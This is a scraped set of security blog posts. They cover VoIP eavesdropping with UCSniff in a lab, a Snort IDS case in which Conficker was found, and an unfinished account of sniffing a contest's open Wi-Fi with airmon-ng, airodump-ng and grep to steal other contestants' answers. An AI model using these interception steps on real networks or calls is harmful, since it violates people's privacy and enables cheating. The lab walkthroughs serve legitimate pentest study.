<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju9OM3tlK4qlrsaN0moZFzFxsVHoqobHNBRfyfd_XKgb1sYdtYxZ4Ke_VTrKJ6llkrqQGx6jvtIlzKknDv54dkLI181Js7vLWQRzEpf_vkN8KxYy70_-ZJ7O3eZCbjg1R8qQbrgkJxQj8/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju9OM3tlK4qlrsaN0moZFzFxsVHoqobHNBRfyfd_XKgb1sYdtYxZ4Ke_VTrKJ6llkrqQGx6jvtIlzKknDv54dkLI181Js7vLWQRzEpf_vkN8KxYy70_-ZJ7O3eZCbjg1R8qQbrgkJxQj8/s320/1.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Generated files</span></div>
<div style="text-align: center;">
<br /></div>
<span class="Apple-style-span" style="font-family: inherit;"><b>TFTP Configuration File Sniffing</b> </span><br />
As I said before I do not have a proper phone for this test, but UCSniff supports it, even TFTP Modify Attack (cursiva) as you can see in the picture.<br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiBLOOvt6G63RZmuVJHBSo-rHs7_FEMFMU0VjOqR4tDVuPG4Vpj4aNFrjmbv1pIbe_ocD6DcOgGTtxG6KPlqbcVa3qnR-znh8u_oPbMKCYSKloCvjVXGQUuJb0vP_mrEYhQlMRUYu1D7I/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiBLOOvt6G63RZmuVJHBSo-rHs7_FEMFMU0VjOqR4tDVuPG4Vpj4aNFrjmbv1pIbe_ocD6DcOgGTtxG6KPlqbcVa3qnR-znh8u_oPbMKCYSKloCvjVXGQUuJb0vP_mrEYhQlMRUYu1D7I/s320/2.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: TFTP Modify Attack</span></div>
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Number Harvesting</b></span><br />
During the sniffing we could see extensions involved in calls on the Output and Status(cursiva) panel. Now we can consult them in <i>call.log</i>, <i>calldetail.log</i> and <i>sip.log</i> , which also stores it with much more detailed log including all SIP messages (<i>REGISTER</i>, <i>INVITE</i>, etc.)<br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsjsO8kiwAIIPFiFw_2BjT10phw5cu0TJIdEfOrG5C34M6KXrWYbVeaDrIQ7nHNhA823dwAJYsTCDeNaoDwCWlHBjXm7ZZIQOiz9sGfddO2lMIJiTdXfYmFIndhbPzrQiGzLqkZ1tYck0/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsjsO8kiwAIIPFiFw_2BjT10phw5cu0TJIdEfOrG5C34M6KXrWYbVeaDrIQ7nHNhA823dwAJYsTCDeNaoDwCWlHBjXm7ZZIQOiz9sGfddO2lMIJiTdXfYmFIndhbPzrQiGzLqkZ1tYck0/s320/3.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Detailed call list</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR-rd5Qq0gZGodtj9rGUFhdUjUQYykR7E74ALHhhqPtmB2elZRAQ0vmEW3dLlHQ1ec9oVsIuqTNqlYKgw3NcpVhwIMPq-NOEO_uXuhl7w7P6WRk-N9akTS2A0JTBDUCc_uOyU2RXeGcHc/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR-rd5Qq0gZGodtj9rGUFhdUjUQYykR7E74ALHhhqPtmB2elZRAQ0vmEW3dLlHQ1ec9oVsIuqTNqlYKgw3NcpVhwIMPq-NOEO_uXuhl7w7P6WRk-N9akTS2A0JTBDUCc_uOyU2RXeGcHc/s320/4.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: INVITE from sip.log </span></div>
<div style="text-align: center;">
<br /></div>
<span class="Apple-style-span" style="font-family: inherit;"><b>Call Pattern Tracking</b></span><br />
Files commented in Number Harvesting cover this point too.<br />
<br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Conversation Eavesdropping and Analysis</b></span><br />
In this example <i>81-Calling-81-18:48:12-3-reverse.wav</i> stores one side conversation for the reasons commented in previous post, but in a real environment we should get something like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuMsk97wUa2Mns_rxkUknMcYT7uxYBBf_1Z6sJgYtjWFxGu3nA8GxrX3V5RVmNKK7zIWtdxSUau38CjorOQEJuXvRpms7KayfdQ2Wg0p_L9WpJSFf61vcP3kaQCL6yEFo02eIRSow_xCk/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuMsk97wUa2Mns_rxkUknMcYT7uxYBBf_1Z6sJgYtjWFxGu3nA8GxrX3V5RVmNKK7zIWtdxSUau38CjorOQEJuXvRpms7KayfdQ2Wg0p_L9WpJSFf61vcP3kaQCL6yEFo02eIRSow_xCk/s320/5.png" width="320" /></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Generated <i>.wavs</i> in real example</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<span class="Apple-style-span" style="font-family: inherit;">Names are really intuitive so, at this point, I think you can understand by yourself all the helpfull information included in other generated files, you can ask me any doubt in a comment or a mail :). In the next post I hope talk about countermesurements porposed for protect a infrastruture against this kind of Eavesdropping attack.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div style="text-align: right;">
<span class="Apple-style-span" style="font-family: inherit;">Jesús Pérez</span></div>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-79702591719622335902011-08-05T16:30:00.065+02:002012-02-11T18:15:14.537+01:00VoIP Eavesdropping: UCSniff (I)<span class="Apple-style-span" style="color: #444444;">After a long time without writing because of different reasons I´m going to begin a group of articles trying to cover different type of attacks against any of the components of a common <a href="http://en.wikipedia.org/wiki/Voice_over_Internet_Protocol">VoIP</a> (Voice Over Internet Protocol) infrastructure and how to stop them. If you are beginning in this world of VoIP I recommend you to read <a href="http://www.google.es/search?sourceid=chrome&ie=UTF-8&q=building+telephony+systems+with+opensips+1.6"><i>Building Telephony Systems with OpenSIPS 1.</i>6</a> where the authors go through basic theoretical and practical skills needed to implement a complete system.</span><br />
<span class="Apple-style-span" style="color: #444444;"><br />
</span><br />
<span class="Apple-style-span" style="color: #444444;">T</span><span class="Apple-style-span" style="color: #444444;">his time, I will start with VoIP <a href="http://es.wikipedia.org/wiki/Eavesdropping">Eavesdropping</a> attack, as the name suggest it consists on listen a conversation without speakers consent. This attack existed in the traditional telephony systems and nowadays is also possible against VoIP ones (and other protocols too, in example bluetooth).</span><br />
<div>
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div>
<div>
<span class="Apple-style-span" style="color: #444444;">As you can imagine we are in front of a classic sniffing attack so, first of all, we need to gain access. Any of the techniques you know are ok, moreover, there are another specific ways for this kind of systems of getting the <i>.pcap</i> file we are looking for. For example, some phones have a "feature" which allows saving a <i>.pcap</i> with all traffic passing over its interfaces and more of them have vulnerabilities in their web control panel, so it could be possible to access to this profitable file :). But this is not the topic of this article despite of being an interesting one too, so I hope take it up again another day.</span></div>
<div>
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div>
<span class="Apple-style-span" style="color: #444444;">Now we have the capture, then we need a tool able to understand <a href="http://es.wikipedia.org/wiki/Session_Initiation_Protocol">SIP</a> (Session Initiation Protocol) and <a href="http://es.wikipedia.org/wiki/Real-time_Transport_Protocol">RTP</a> (Real-time Transport Protocol), among others. The most used option is <a href="http://www.wireshark.org/">Whireshark</a>, but <a href="http://wiki.wireshark.org/VOIPProtocolFamily">it doesn´t support H.264 video codec</a> so we can´t eavesdrop video conversations, in this case we should call it IP Video Eavesdropping not VoIP Eavesdropping. I found this video where we can see an example of this:</span></div>
</div>
<div>
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="color: #444444;"><object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://3.gvt0.com/vi/K6rvhjt_HvM/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/K6rvhjt_HvM&fs=1&source=uds" />
<param name="bgcolor" value="#FFFFFF" />
<embed width="320" height="266" src="http://www.youtube.com/v/K6rvhjt_HvM&fs=1&source=uds" type="application/x-shockwave-flash"></embed></object></span></div>
<div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444; font-size: x-small;"><a href="http://www.youtube.com/watch?v=K6rvhjt_HvM&feature=player_embedded">Video: Conversation Eavesdropping with Wireshark</a></span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">I like Wireshark for studying specific situations but, anyway, we need something more automatic for pentesting tests in order to be capable of reconstruct and synchronize conversations correctly. I usually use <a href="http://www.xplico.org/">Xplico</a> for this kind of things but, for the moment, SIP, SDP and RTP protocol are not fully supported as we can see in the website:</span></div>
</div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhST2PKGHzYlswblWx7skahSvdq34JLV1G2hPgw4BxFD4lrPD9b0_QEISHmaWoqIArnsh4OFxuPW_yZxzfRvOYOWJ75TDqdFZmIElpIzaPkWEzdCUC3xaFfduNMOIEPr-BcU7h11NqbS8c/s1600/0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhST2PKGHzYlswblWx7skahSvdq34JLV1G2hPgw4BxFD4lrPD9b0_QEISHmaWoqIArnsh4OFxuPW_yZxzfRvOYOWJ75TDqdFZmIElpIzaPkWEzdCUC3xaFfduNMOIEPr-BcU7h11NqbS8c/s320/0.png" width="278" /></span></a></div>
<div style="text-align: left;">
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444; font-size: x-small;">Figure: Xplico supported protocols state </span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">Today we will use <a href="http://ucsniff.sourceforge.net/index.html">UCSniff</a>, a tool which allows to rapidly test for the threat of unauthorized VoIP and Video Eavesdropping. I paste here some features:</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">- Audio Eavesdropping</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">- Video Eavesdropping (creates H.264 format file)</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">- Realtime Audio Monitor</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">- GUI Support</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">- Realtime Video Monitor</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">- Creates an avi file and muxes audio and video</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">- Creates a wav file and muxes both forward and reverse audio</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">For this POC (Proof Of Concept) I will use two virtual machines, one with <a href="http://www.backtrack-linux.org/">BT</a> (Backtrack) 5 and <a href="http://www.zoiper.com/download_list.php">Zoiper Classic</a> as client (I had problems running Ekiga on BT5) and another with a Debian Squeeze with a basic installation of <a href="http://www.asterisk.org/">Asterisk</a>. It is not a very real environment but it´s enough for this POC, so we don´t need to do <a href="http://en.wikipedia.org/wiki/Man-in-the-middle_attack">MitM</a> (Main in the Middle). I’m sure if you are reading this you know how to gain access with you favorite sniffer or UCSniff ;).</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">OK, first we need to download the latest version of UCSniff (<a href="http://sourceforge.net/projects/ucsniff/files/ucsniff/ucsniff-3.1%20src/">here</a>) and to install dependencies to compile it on BT5 with GUI (Graphical User Interface) and realtime video monitor:</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">apt-get install build-essential zlib1g-dev liblzo2-dev libpcap0.8-dev libnet1-dev libasound2-dev libbz2-dev libncurses5-dev apt-get install libx11-dev libxext-dev libfreetype6-dev</span></i></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">NOTE: VLC version and development libraries included in BT5 broke the compilation, so we have to install it directly from VLC repositories before:</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">add-apt-repository ppa:lucid-bleed/ppa</span></i></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">apt-get update</span></i></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">apt-get install vlc libvlc-dev</span></i></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">Now, go in ucsniff-3.0 folder and compile it:</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">./configure --enable-libvlc --enable-gui</span></i></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">make</span></i></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">make install</span></i></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">We are ready for run it (graphical interface) for the first time:</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<i><span class="Apple-style-span" style="color: #444444;">ucsniff -G</span></i><br />
<i><span class="Apple-style-span" style="color: #444444;"><br />
</span></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbEXzu6RzUp3cJsuINYcp1zQqS4IprYK2gpGetdX_pIUGndBvTi__cmfL2hnob456GmAcwPoU8M8GTynqiiv6T2NhCh53_AoGvPwIsbSu0pM5EtPsR2pbMs6Hxo3iRs4hMkneT0hNDrPk/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbEXzu6RzUp3cJsuINYcp1zQqS4IprYK2gpGetdX_pIUGndBvTi__cmfL2hnob456GmAcwPoU8M8GTynqiiv6T2NhCh53_AoGvPwIsbSu0pM5EtPsR2pbMs6Hxo3iRs4hMkneT0hNDrPk/s320/1.png" width="320" /></span></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444; font-size: x-small;">Figure: UCSniff general view</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">Yes, it´s not too sexy, above all these evil buttons! xD. For this test we have to select <i>Monitor Mode</i> and <i>Start Sniffing</i> like in the picture and the sniffer will start to capture. Next step is making a call, I will call myself (yes, it´s possible! you should try it :D).</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444; font-size: x-small;"><br />
</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjecethOCkpVotsZH9qo-RmHHTNMaKS5tC645-qxP_IaMtbH6yQhvg5VS_9QdccHnf1p8JOtenexPvRtII5zoxFzDg1ZCMw5gIsCak56LCIkD5Yd-QdwSJ1wehgqyMhgdeJzxXiHA7SbRE/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjecethOCkpVotsZH9qo-RmHHTNMaKS5tC645-qxP_IaMtbH6yQhvg5VS_9QdccHnf1p8JOtenexPvRtII5zoxFzDg1ZCMw5gIsCak56LCIkD5Yd-QdwSJ1wehgqyMhgdeJzxXiHA7SbRE/s320/2.png" width="320" /></span></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="color: #444444;">Figure: Calling myself</span></span></div>
<div style="text-align: center;">
</div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span><br />
<span class="Apple-style-span" style="color: #444444;">After accepting the incoming <i>Output Console</i> will log it as in the next two pictures (second took after hang up from one side).</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwauLJk21lq1kmkeV5MwNdu4ivjdpXSE4G43tP83eGDuL_f-15SeR7s5N0ggLlQHcIqHgM67R_0tiPwMh1uG-OilOUvfAlzpaFSPyZXRav3fi0FpohlmJK2x5rYUzdB19WwbDEIngkfJw/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwauLJk21lq1kmkeV5MwNdu4ivjdpXSE4G43tP83eGDuL_f-15SeR7s5N0ggLlQHcIqHgM67R_0tiPwMh1uG-OilOUvfAlzpaFSPyZXRav3fi0FpohlmJK2x5rYUzdB19WwbDEIngkfJw/s320/4.png" width="320" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxYiLT0aLR1akO9XLW2TQFGzE1DQVDb-v_ZtTQ5GZmGrS9798_bPHXq1lVnQFZYVeEIOZGSVGE9zipQoehX4gXJ5AFLkk4S5j-UwkfUwABbMw9AAFF_xNnXeWk0ztSYH_DDeWXIoghS4k/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxYiLT0aLR1akO9XLW2TQFGzE1DQVDb-v_ZtTQ5GZmGrS9798_bPHXq1lVnQFZYVeEIOZGSVGE9zipQoehX4gXJ5AFLkk4S5j-UwkfUwABbMw9AAFF_xNnXeWk0ztSYH_DDeWXIoghS4k/s320/5.png" width="320" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="color: #444444;">Figure: Logging calls</span></span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;">Well done!, we can see the conversation was captured, there are two calls instead of only one because of virtual machine interface really is mapped to another, but it works, one of this two .wav will be empty and the other will contain saved conversation. I think it´s enough for the first day. Next article we will review all the outputs produced by the sniffer and we are going to deep a bit more in this attack. At the moment, I recommend you visiting the site of the tool where you can learn more about it and view examples using the GUI with MitM and Video Eavesdropping: <a href="http://ucsniff.sourceforge.net/guiusage.html">http://ucsniff.sourceforge.net/guiusage.html</a></span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://ucsniff.sourceforge.net/images/screenshots/livemonitor1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="200" src="http://ucsniff.sourceforge.net/images/screenshots/livemonitor1.png" width="320" /></span></a></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444; font-size: x-small;">Figure: UCSniff Video Eavesdropping</span></div>
<div style="text-align: center;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: left;">
<span class="Apple-style-span" style="color: #444444;"><br />
</span></div>
<div style="text-align: right;">
<span class="Apple-style-span" style="color: #444444;">Jesús Pérez</span></div>
</div>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-60476128612788486962011-03-02T13:08:00.009+01:002012-02-11T18:16:13.015+01:00¿Por qué utilizar un IDS?: Un caso real con Snort<div>
<div>
<a href="http://nicerosniunos.blogspot.com/2011/01/snort-for-dummies-insta-snort.html">En un artículo anterior</a> expliqué como instalar de forma sencilla un sistema de detección de intrusos (IDS), más concretamente <a href="http://www.snort.org/">Snort</a> con la interfaz <a href="http://snorby.org/">Snorby</a>. Hoy voy a mostrar la potencia de este tipo de aplicaciones a través de un ejemplo que me encontré en mi trabajo como consultor.<br />
Para situarnos un poco imaginemos una PYME sin ningún responsable del área de sistemas, como muchas en España. Cuando llegas tardas un tiempo en conocer el funcionamiento de todo el sistema (ya que no hay una persona a quien consultarle las dudas) y un IDS ayuda mucho en esta tarea detectando anomalías en el tráfico de red de la organización.<br />
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdYmpypQhE79iGk2gTTxiYSQk9w3q7L_h0M-LUoXSMo1ENl_9kK-8JjQ8qe5_QFL_WaAnpTm95vFlGdGFzQ4vt-q41o_b9Zqh9ymGCbwaGx19C3eF5m_pERObHD7WfTPqMTFOo0g9bO5A/s1600/1.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5579460944554265586" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdYmpypQhE79iGk2gTTxiYSQk9w3q7L_h0M-LUoXSMo1ENl_9kK-8JjQ8qe5_QFL_WaAnpTm95vFlGdGFzQ4vt-q41o_b9Zqh9ymGCbwaGx19C3eF5m_pERObHD7WfTPqMTFOo0g9bO5A/s400/1.png" style="cursor: pointer; display: block; height: 387px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 400px;" /></a></div>
<div>
<div style="text-align: center;">
<span class="Apple-style-span"><u><br /></u></span></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdYmpypQhE79iGk2gTTxiYSQk9w3q7L_h0M-LUoXSMo1ENl_9kK-8JjQ8qe5_QFL_WaAnpTm95vFlGdGFzQ4vt-q41o_b9Zqh9ymGCbwaGx19C3eF5m_pERObHD7WfTPqMTFOo0g9bO5A/s1600/1.png"></a><br />
En la primera imagen (vista del último año) se observa que al principio se detectaron mas de 70 incidencias clasificadas como graves y muchísimas leves, las medias las provoqué yo probando con el nmap. Ésto me llevó a investigar un poco más y resultó que el antivirus no escaneaba (o no lo hacía bien del todo) un tipo de ficheros específico de una aplicación y ahí se escondía el archifamoso gusano <a href="http://es.wikipedia.org/wiki/Conficker">Conficker</a> en algunos de los equipos. Podemos ver en la gráfica anterior que tras la eliminación del virus se redujeron drásticamente las alertas hasta llegar a la situación actual de la siguiente imagen (vista del último mes). <br />
NOTA: Es importante revisar también las de severidad baja aunque siempre se tratan de falsos positivos.</div>
<div>
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoW5K1rHfnzw0OAXy5qzzyM8BYyBONORTysvrqd5eB8zzawd9Arf_F7bzKxijmkgYvTyXFVhyulPmXBP46YpkFLGy4rk_eLjYvVVzJQe3ra9rsvc08fFVk_e6USfOuGForgjJR0mgmdsc/s1600/2.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5579461127813469218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoW5K1rHfnzw0OAXy5qzzyM8BYyBONORTysvrqd5eB8zzawd9Arf_F7bzKxijmkgYvTyXFVhyulPmXBP46YpkFLGy4rk_eLjYvVVzJQe3ra9rsvc08fFVk_e6USfOuGForgjJR0mgmdsc/s400/2.png" style="cursor: hand; cursor: pointer; display: block; height: 389px; margin: 0px auto 10px; text-align: center; width: 400px;" /></a><br />
<div>
<br />Lo que quiero destacar es que nos ayudó a detectar un problema que no sabíamos que existía como lo puede hacer con muchos otros. Otra ventaja de su uso es que ayuda a conocer un poco más sobre el funcionamiento de la red de la organización. :)<br />
<br />
<div style="text-align: right;">
Jesús Pérez</div>
</div>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-54362439593345147442011-02-28T13:19:00.027+01:002012-02-11T18:45:39.156+01:00El que roba a un landrón ... : h4ckc0nt3st GSICACTUALIZACIÓN: Veo en el twitter <a href="http://www.lucianobello.com.ar/post/how-to-hack-a-h4ckc0nt3st/">que no fuimos los únicos</a> :)<br />
<div>
El Jueves llegamos tarde a la <a href="http://www.fi.udc.es/">fic</a> comentando que seguro que ya era tarde para apuntarnos al h4ck0nt3st de las <a href="http://www.gsicoruna.com/jornadas/">GSIC</a>, pero cuando entramos en la sala estaba empezando <a href="http://www.reversemode.com/">Rubén Santamarta</a> y no todos los días tenemos el placer de poder escuchar a alguien que hace "lo que él hace", así que decidimos aplazar lo de la inscripción.<br />
Cuando conseguimos empezar a jugar vimos que alguno ya llevaban 6 o 7 respuestas y tras solucionar los primeros retos que eran facilitos vimos que no iba a haber manera de coger a los que iban en cabeza por lo que nos fuimos a comer con tranquilidad.<br />
Por el camino se nos ocurrió que "esnifando" todos los paquetes de la red inalámbrica (abierta) seríamos capaces de capturar las respuestas del resto de participantes, ya que la aplicación que se utilizaba en el h4ckc0nt3st no cifraba la comunicación. De esta manera iríamos guardando las respuestas y las rellenaríamos poco a poco para que no fuera demasiado descarado.<br />
Tras la comida volvimos a la facultad y hubo suerte, había gente peleándose con las pruebas:<br />
- Primero pusimos la tarjeta en modo monitor:<br />
<i>airmon-ng start wlan0</i><br />
- Capturamos todo lo de el canal y el BSSID del h4ckc0nt3st:<br />
<i>airodump-ng --bssid X --channel 13 -w capture mon0</i><br />
- Como teníamos prisa porque nos empezaba el taller de <a href="http://twitter.com/#!/aramosf">Alejandro Ramos</a>, el cual recomendamos a todo el mundo, en vez de utilizar el <i>Wireshark</i> probamos con el comando<i>strings</i> y un simple <i>grep </i>y vimos que esto iba a funcionar:<br />
<i>strings capture-01.cap | grep clave</i><br />
<i><br /></i></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0x_ERn4nY3Ze-DYI0MgW2r4ayFBoWc-Ele2epXio7zQUHyfcJHNnNnTvsQiQy6OTUnP4fsgqV9Z8PPkZp_KWZqVMuJcizg8v61T1cxybCZMRjarh-SdlaLrwIrmvOo8GpmVYfvJ85yK4/s1600/1.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5578866055094446562" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0x_ERn4nY3Ze-DYI0MgW2r4ayFBoWc-Ele2epXio7zQUHyfcJHNnNnTvsQiQy6OTUnP4fsgqV9Z8PPkZp_KWZqVMuJcizg8v61T1cxybCZMRjarh-SdlaLrwIrmvOo8GpmVYfvJ85yK4/s400/1.png" style="cursor: pointer; display: block; height: 116px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 400px;" /></a><br />
<div style="text-align: center;">
<br />
<div style="text-align: left;">
Nos encontramos algunos problemas:</div>
</div>
- Obteníamos también las respuestas erróneas y probarlas todas sería muy ruidoso, así que lo solucionamos afinando un poco el filtrado y listo:<br />
<i>strings capture-01.cap | grep -i -C500 superado | grep clave=</i><br />
<br />
